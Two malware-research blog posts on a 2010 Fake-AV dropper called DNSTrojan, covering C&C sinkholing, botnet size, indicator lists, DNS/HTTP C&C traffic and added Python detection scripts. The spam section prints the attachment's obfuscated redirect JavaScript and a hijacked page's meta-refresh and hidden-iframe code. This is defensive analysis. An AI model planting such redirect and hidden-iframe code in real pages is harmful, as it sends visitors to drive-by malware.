# Mitigating the DNSTrojan Threat

A few days ago I published a short analysis of a Trojan dropper which I call DNSTrojan (see New Dropper Uses DNS To Communicate). During this week I’ve tried to mitigate the threat by nuking at least some of the DNSTrojan C&C domain names, pointing them to my sinkhole.

In the first attempt I was able to redirect the traffic of the C&C servers to my sinkhole for around 9 hours. Afterwards the cybercriminals propagated a new C&C domain to the infected clients using httpdsconfig.com (the infected clients regularly contact httpdsconfig.com via DNS to receive a list of C&C domains they should use).

A few hours later I was able to sinkhole the new domain name as well. Below is a chart showing the number of Apache handlers during the time the domain names have pointed to the sinkhole:

As you can see, the sinkhole had a huge server load. In total, the C&C traffic was redirected to my sinkhole for 10 hours. During this time I counted 23’000 unique IPs hitting the sinkhole, so I estimate the botnet size at 35k-50k unique IPs per day. This seems to be a huge number, but in fact this isn’t a really BIG botnet (for comparison: recently I was able to monitor a botnet which had a size of over 320’000 unique IPs per day).

Below is a chart which shows the botnet Geo location of the Trojan:

During the sinkhole action I was confronted with an unexpected problem: the botnet size wasn’t a problem, but the fact that each bot queries the C&C every 30 seconds pushed my server into performance problems. As you can see on the chart above, it ended with a downtime of the sinkhole server. In cooperation with Shadowserver I’ve now moved the domain names over to Shadowserver’s sinkhole, which should be able to handle that amount of requests easily.

In the last blog post I published a list of C&C domains which are associated with the Trojan. Below is an updated list with additional domain names which I’ve come across so far:

counterslocal.com
httpdsconfig.com
httpsquer.com
httpconfig.com
httpsbee.in
httpsgate.in
httpsget.in
httpsport.in
httpssite.in
httpson.in
httpsone.in
httpssresrun.com
httpssun.in
httpstatsconfig.com
httpsxy.in
httpszero.in
newsafetyplace.com
securitysoftwaretechltd2010.com

Another interesting find which I made during the sinkholing action is that the cybercriminals are obviously using some kind of monitoring server. They periodically call a PHP file called check.php on the C&C domain names to check whether the servers are still accessible:

95.143.192.14 “HEAD /check.php HTTP/1.1” 200 “curl/7.18.2 (x86_64-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8 libssh2/0.18”
94.75.197.209 “HEAD /check.php HTTP/1.1” 200 “curl/7.18.2 (x86_64-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8 libssh2/0.18”
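Both observations above (the 30-second polling that overloaded the sinkhole, and the curl HEAD /check.php probes from the operators’ monitoring hosts) can be pulled out of a sinkhole’s Apache access log automatically. The following script is an added example, not code from the original post: it parses Apache combined-format lines, counts unique client IPs, flags clients whose requests arrive on a fixed interval, and lists hosts that probe /check.php with curl. The log lines are constructed for illustration and use documentation IP ranges; the /check.php rule reproduces the pattern quoted above.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Apache "combined" log format; the bracketed timestamp is %d/%b/%Y:%H:%M:%S %z.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: two bots polling getfile.php every 30 s, one ordinary
# visitor, and one curl HEAD /check.php probe like the ones quoted in the post.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Sep/2010:19:00:00 +0000] "GET /getfile.php?r=XXXX&p=QUJD HTTP/1.1" 404 162 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
192.0.2.10 - - [21/Sep/2010:19:00:30 +0000] "GET /getfile.php?r=XXXX&p=QUJD HTTP/1.1" 404 162 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
192.0.2.10 - - [21/Sep/2010:19:01:00 +0000] "GET /getfile.php?r=XXXX&p=QUJD HTTP/1.1" 404 162 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
192.0.2.10 - - [21/Sep/2010:19:01:30 +0000] "GET /getfile.php?r=XXXX&p=QUJD HTTP/1.1" 404 162 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
198.51.100.7 - - [21/Sep/2010:19:00:05 +0000] "GET /getfile.php?r=XXXX&p=REVG HTTP/1.1" 404 162 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
198.51.100.7 - - [21/Sep/2010:19:00:35 +0000] "GET /getfile.php?r=XXXX&p=REVG HTTP/1.1" 404 162 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
198.51.100.7 - - [21/Sep/2010:19:01:05 +0000] "GET /getfile.php?r=XXXX&p=REVG HTTP/1.1" 404 162 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
203.0.113.42 - - [21/Sep/2010:19:00:12 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1)"
203.0.113.42 - - [21/Sep/2010:19:07:48 +0000] "GET /robots.txt HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 6.1)"
203.0.113.99 - - [21/Sep/2010:19:05:00 +0000] "HEAD /check.php HTTP/1.1" 200 - "-" "curl/7.18.2 (x86_64-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8 libssh2/0.18"
"""


def parse_log(text):
    """Parse combined-format lines into dicts; lines in another format are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entries.append(rec)
    return entries


def unique_clients(entries):
    """Set of distinct client IPs (the figure the post reports per sinkhole day)."""
    return {e["ip"] for e in entries}


def find_beacons(entries, expected=30.0, tolerance=2.0, min_hits=3):
    """Return {ip: median gap in seconds} for clients whose requests arrive on a
    fixed interval close to `expected` (30 s for the getfile.php poll)."""
    by_ip = defaultdict(list)
    for e in entries:
        by_ip[e["ip"]].append(e["time"])
    beacons = {}
    for ip, times in by_ip.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        gap = median(gaps)
        if abs(gap - expected) <= tolerance:
            beacons[ip] = gap
    return beacons


def find_monitor_probes(entries):
    """IPs that HEAD /check.php with a curl user agent, i.e. the operators' uptime checks."""
    return sorted({e["ip"] for e in entries
                   if e["method"] == "HEAD" and e["path"] == "/check.php"
                   and e["ua"].startswith("curl/")})


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    print("unique client IPs:", len(unique_clients(entries)))
    for ip, gap in find_beacons(entries).items():
        print(f"beacon: {ip} polls every ~{gap:.0f}s")
    print("monitor probes from:", find_monitor_probes(entries))
```

The beacon check looks at timing only, so it works even after the operators change the path or user agent; the monitoring-probe rule is deliberately narrow, because a curl HEAD against a fixed PHP path is exactly what the two quoted lines show and nothing a bot does.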

The two monitoring servers are located in Sweden and the Netherlands:

AS number: AS49770
AS name: SERVERCONNECT-AS ServerConnect Sweden AB
Country: Sweden

AS number: AS16265
AS name: LEASEWEB AS
Country: Netherlands

If we put the things together we can draw the following picture:

As shown above, the C&C servers are obviously just acting as nginx proxies which redirect the traffic to the real mothership (which is currently unknown). Here is the list of nginx proxies which I’ve identified so far:

69.197.147.186 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
69.197.147.187 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
69.197.147.188 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
69.197.147.189 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
69.197.147.190 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
204.12.223.186 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
204.12.223.187 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
204.12.223.188 | US | AS32097 | WII-KC – WholeSale Internet, Inc.
204.12.223.190 | US | AS32097 | WII-KC – WholeSale Internet, Inc.

Let’s see where they are moving to during the next few days…

# New Dropper Uses DNS To Communicate

During the last few weeks I’ve monitored a new Dropper which is using DNS and HTTP in combination to communicate with the Command&Control Server (C&C).

I first saw the Trojan on 2010-06-08 being dropped by a well known Exploit Kit called NeoSploit. The AV detection rate is pretty good: most AV vendors currently detect the binaries which are used to spread the Trojan as Fake-AV. As far as I have seen, this Trojan is just a dropper which drops additional Fake-AV software.

Back in June, when I first saw the Trojan, I added a signature to AMaDa. Hence AMaDa tags the binaries and URLs which are associated with this Trojan as DNSTrojan.

In September 2010 I saw a peak on AMaDa in new URLs propagating DNSTrojan:

Over the past days I’ve seen dozens of domain names popping up which are being used to spread the Trojan (using drive-by exploits). Here are some of them:

hezhett.co.cc
hezhexh.co.cc
hezhlhe.co.cc
hezhthu.co.cc
hezlhez.co.cc
hezlhhh.co.cc
hhehshe.co.cc
hheuhhh.co.cc
hhezhez.co.cc
hutahhe.co.cc
hzthezh.co.cc
scaner-ap.cz.cc
scaner-as.cz.cc
scaner-anti.cz.cc
scaner-all.cz.cc
scaner-ac2.cz.cc
scaner-access.cz.cc
scaner-acea.cz.cc
scaner-aced.cz.cc
scaner-acef.cz.cc
scaner-acer.cz.cc
scaner-dual.cz.cc
scaner-fast.cz.cc
scaner-g.cz.cc
scaner-gammi.cz.cc
scaner-go.cz.cc
scaner-h.cz.cc
scaner-hello.cz.cc
scaner-high.cz.cc
scaner-i.cz.cc
scaner-idea.cz.cc
scaner-internet.cz.cc
scaner-ip.cz.cc

As already mentioned, the Trojan is just being used to drop Fake-AV software. For now I’ve identified the following domain names which are associated with this Fake-AV campaign:

desktopsecurity2010soft.com
desktopsecuritycorp.com
desktopsecurityorg.com
desktopsecuritysoft2010.com
desktopsecuritysolution.com
desktopsecuritytech2010.com
securitysoftware2010tech.com
securitysoftwaretech2010ltd.com

*** Spam Mails propagating the DNSTrojan ***

This week I found dozens of spam mails in my honeypots which had an HTML file attached. Some of the subjects I’ve seen so far are:

• Consultation Appointment
• Questions
• Outstanding invoice – 9386 Ltd
• Nivea commercial payment
• Appraisal – Killington $155000
• Re: GO HOME + SHE SAID / 4.3.2.1./
• Transaction Breakdown
• Offer on Killington
• Fwd: Addendum to extend close of escrow!
• Signatures to Intercreditor
• demands for payment
• Mortgage Breakdown PITI
• notes from last week
• and many more…

The HTML files which are attached to all those spam mails contain JavaScript code:

<script type='text/javascript'>
<!--
var s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00cmbdlmfgjmn/dpn0y/iunm#!0?";
m="";
for (i=0; i<s.length; i++) {
  if (s.charCodeAt(i) == 28) { m += '&'; }
  else if (s.charCodeAt(i) == 23) { m += '!'; }
  else { m += String.fromCharCode(s.charCodeAt(i)-1); }
}
document.write(m);
//-->
</script>

Hum? Obfuscated JavaScript code. If we decode it, the following HTML code appears:

<meta http-equiv="refresh" content="0;url=http://blacklefilm.com/x.html" />

The JavaScript code embedded in the malicious attachment redirects the victim to a hijacked website which displays the following message in the web browser:

For now I’ve seen the following hijacked websites involved in this spam campaign:

blacklefilm.com/x.html
chautoy.co.za/x.html
numerouno-india.com/x.html
universelles.com/x.html
gvperkins.com/x.html
nobletree.org/x.html
turksagliksen.org.tr/x.html
acquaintive.in/x.html
hesswoodrecycling.com/x.html
equus-ing.com.ar/x.html
barrhavenbia.ca/x.html
annechristene.com/x.html
www.mindconnect.nl/x.html
meltemtvreklam.com/x.html
cernoma.com/x.html
chautoy.co.za/x.html
firstchurchofgodkokomo.org/x.htm
euroiris.cz/x.html

The hijacked website tries to do two things:

1. Install the ZeuS Banking Trojan using drive-by exploits (see AMaDa)
2. Redirect the victim once again to a site which is controlled by the cybercriminals to distribute DNSTrojan

The HTML source code of the hijacked websites (x.html) looks like this:

<meta http-equiv="refresh" content="4;url=http://lausakizse.cz.cc/scanner10/?afid=24" />
<iframe width="0" height="0" src="http://wedubud.co.cc/ajax/?db=img&showtopic=11ss&last=redirect& [...]"></iframe>

Once the victim has been redirected to the site controlled by the cybercriminals, the page tries to convince the victim that his computer is infected with malware and offers him a malicious EXE file:

The binary served by those websites contains the DNSTrojan and is detected as “Fake-AV” by most AV vendors:

Filename: antivirus.exe
File size: 169984 bytes
MD5: a00b75b0d43702d4b099548b90c715c7
SHA1: 559a83509db3969f5207615d48fe70dcb1997bb8
VT: 33/43 (76.7%)

As of 2010-09-21 19:00 UTC, the spam campaign is still going on.

*** The DNSTrojan ***

Let’s take a closer look at the Trojan which is being dropped. The Trojan installs itself into the following directories:

c:\program files\common files\microsoft shared\web folders\servemonsonsext.exe
c:\program files\common files\microsoft shared\Triedt\trieditriedit.exe
c:\program files\common files\microsoft shared\TextConv\quillmsconv97.exe

Note that the file names used by the Trojan vary. Additionally the Trojan has an interesting behavior when Apple QuickTime is installed on the victim’s computer: it will install itself into the QuickTime directory:

c:\program files\quicktime\pictureviewer.resources\nl.lproj\quicktimequicktime.exe
c:\program files\apple software updatesoftwareupdate.resource\it.lproj\AppleUpdate2.0.0.10.exe
c:\program files\apple software update\softwareupdate.resource\fr.lproj\AppleUpdate.exe

In a next step the Trojan contacts its first Command&Control Server, which is located at httpdsconfig.com.
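The attachment script described in the spam section above only shifts character codes, so it can be decoded without rendering the HTML in a browser. The following is an added example, not code from the original post: it re-implements the script’s decoding loop in Python, pulls the `var s="..."` payload out of an attachment, and then extracts the redirect targets (meta refresh and hidden iframe) from the decoded markup and from an x.html page. The attachment sample wraps the script quoted above in minimal HTML; the x.html sample reuses the refresh URL quoted above, while its iframe src is a constructed placeholder because the real one is elided in the post.

```python
import re

# The obfuscated string quoted in the post's spam attachment.
OBFUSCATED = "=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00cmbdlmfgjmn/dpn0y/iunm#!0?"

# Constructed sample attachment: the script quoted in the post inside minimal HTML.
ATTACHMENT = """<html><body><script type='text/javascript'>
<!--
var s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00cmbdlmfgjmn/dpn0y/iunm#!0?";
m="";
for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}
document.write(m);
//-->
</script></body></html>"""

# Constructed sample standing in for the hijacked x.html page: the refresh URL is the
# one quoted in the post, the iframe src is a placeholder (the real one is elided there).
X_HTML = (
    '<meta http-equiv="refresh" content="4;url=http://lausakizse.cz.cc/scanner10/?afid=24" />\n'
    '<iframe width="0" height="0" src="http://iframe-placeholder.invalid/ajax/?db=img"></iframe>'
)


def decode_shift(s):
    """Mirror the attachment's loop: code 28 -> '&', code 23 -> '!', otherwise code - 1."""
    out = []
    for ch in s:
        code = ord(ch)
        if code == 28:
            out.append("&")
        elif code == 23:
            out.append("!")
        else:
            out.append(chr(code - 1))
    return "".join(out)


def decode_attachment(html):
    """Decode every `var s="..."` payload found in an attachment's script block."""
    return [decode_shift(s) for s in re.findall(r'var\s+s\s*=\s*"([^"]*)"', html)]


META_REFRESH_RE = re.compile(
    r'<meta[^>]*http-equiv=["\']refresh["\'][^>]*content=["\']\s*(\d+)\s*;\s*url=([^"\']+)',
    re.IGNORECASE)
IFRAME_SRC_RE = re.compile(r'<iframe[^>]*\ssrc=["\']([^"\']+)', re.IGNORECASE)


def redirect_targets(html):
    """Return (delay_seconds, url) for meta refreshes and (None, url) for iframe sources,
    i.e. every place the page will send the browser next."""
    targets = [(int(delay), url) for delay, url in META_REFRESH_RE.findall(html)]
    targets += [(None, url) for url in IFRAME_SRC_RE.findall(html)]
    return targets


if __name__ == "__main__":
    for decoded in decode_attachment(ATTACHMENT):
        print("decoded attachment:", decoded)
        print("attachment redirects to:", redirect_targets(decoded))
    print("x.html redirects to:", redirect_targets(X_HTML))
```

Running the decoder over a mailbox of attachments gives the list of first-hop (hijacked) sites directly, and applying redirect_targets to each fetched x.html gives the second hop; together that reproduces the chain the post describes without executing any of the attacker’s script.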
But the interesting thing is that the Trojan uses DNS instead of HTTP to communicate with the C&C in the first stage:

Standard query TXT 1284891734.httpdsconfig.com
Standard query response TXT

The Trojan does a DNS TXT query to httpdsconfig.com every few minutes, using the current UNIX timestamp as subdomain (*unixtimestamp*.httpdsconfig.com). The C&C server replies with an encrypted string (which seems to be always the same):

$ dig 1284215737.httpdsconfig.com TXT +short
“a0dfe9b34e6c3bc167fc890a20dc283ab8c397eed489f2f737
efceb0064fbba77dc71472b59dde25a2f6f1883ffdc3b1f5ec9
1caf610f02c3b85e8cb831f81e554a83706c8849dd4cfa9ef0c
205c87f5e93f7a5323e71e35d566fe9fc8916717f69304”
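The timestamp-as-subdomain pattern just described is easy to spot in resolver logs: the leftmost label of the TXT query name is a 10-digit number that lies within a short window of the time the query was logged. The following is an added example, not code from the original post; it scans a simplified, space-separated query log (epoch time, client, query name, query type, a constructed format rather than any particular resolver’s) and reports which clients queried such names under which parent domain. The log lines are constructed; the first query name is the one quoted above.

```python
import re
from collections import defaultdict

LABEL_EPOCH = re.compile(r"^\d{10}$")

# Constructed sample log: "<epoch seen> <client> <qname> <qtype>".
# Two clients beacon with timestamp labels; the third client's TXT queries are
# legitimate or merely look numeric (8 digits, or a 10-digit label far from the
# time it was seen) and must not be flagged.
SAMPLE_DNS_LOG = """\
1284891734 192.0.2.10 1284891734.httpdsconfig.com TXT
1284891914 192.0.2.10 1284891914.httpdsconfig.com TXT
1284891740 198.51.100.7 1284891740.httpdsconfig.com TXT
1284891750 203.0.113.42 www.example.com A
1284891760 203.0.113.42 _dmarc.example.com TXT
1284891770 203.0.113.42 20100921.example.net TXT
1284891780 203.0.113.42 1099511627.example.org TXT
"""


def parse_dns_log(text):
    """Return (seen_at, client, qname, qtype) tuples; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        seen_at, client, qname, qtype = parts
        records.append((int(seen_at), client, qname.rstrip(".").lower(), qtype.upper()))
    return records


def is_epoch_label(label, seen_at, max_skew):
    """True if `label` is a 10-digit UNIX timestamp within max_skew seconds of seen_at."""
    if not LABEL_EPOCH.match(label):
        return False
    return abs(int(label) - seen_at) <= max_skew


def detect_timestamp_txt_beacons(records, max_skew=86400):
    """Map parent domain -> sorted clients that sent TXT queries for <epoch>.<parent>."""
    hits = defaultdict(set)
    for seen_at, client, qname, qtype in records:
        if qtype != "TXT":
            continue
        first, _, parent = qname.partition(".")
        if parent and is_epoch_label(first, seen_at, max_skew):
            hits[parent].add(client)
    return {parent: sorted(clients) for parent, clients in hits.items()}


if __name__ == "__main__":
    for parent, clients in detect_timestamp_txt_beacons(parse_dns_log(SAMPLE_DNS_LOG)).items():
        print(f"{parent}: {len(clients)} client(s) beaconing via TXT -> {', '.join(clients)}")
```

Because every query name is unique, a caching resolver never answers one of these from cache and forwards each to the authoritative server; that is presumably why the timestamp is there, and it also means every beacon is visible in the resolver’s query log rather than being hidden behind a cached answer. The skew window is wide on purpose: a bot with a wrong clock still produces a label close to the logged time, while an unrelated numeric label almost never does.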

Afterwards the Trojan resolves the domain name desktopsecuritysolutionnew.com and contacts a second C&C server located at httpsxy.in. This time the Trojan uses HTTP to communicate with the C&C:

GET /httpss/v=&step=2&hostid= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: httpsxy.in

The C&C server answers with HTTP 404 (Not Found), but the response contains encrypted data anyway. I assume the cybercriminals do this to fool security researchers and IDS/IPS:

Server: nginx/0.7.67
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

*encrypted-data*

Last but not least, the Trojan queries a third C&C server located at httpsbee.in every 30 seconds:

GET /getfile.php?r=XXXX&p= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: httpsbee.in

Note that the p parameter is a base64-encoded encrypted string containing the values “MACHINE”, “OP” and “TRK”.

*** Conclusion ***

• The Trojan is pretty new (first seen in June 2010)
• The detection rate on the Trojan binaries is currently pretty good
• The Trojan uses DNS and HTTP to communicate with the C&C
• The Trojan drops Fake-AV software (using “getfile.php”)

I recommend blocking access to the following domain names which are associated with DNSTrojan:

httpdsconfig.com (204.12.223.190 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpsbee.in (204.12.223.186 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpsxy.in (69.197.147.188 – AS32097 WII-KC – WholeSale Internet, Inc.)
httpssite.in –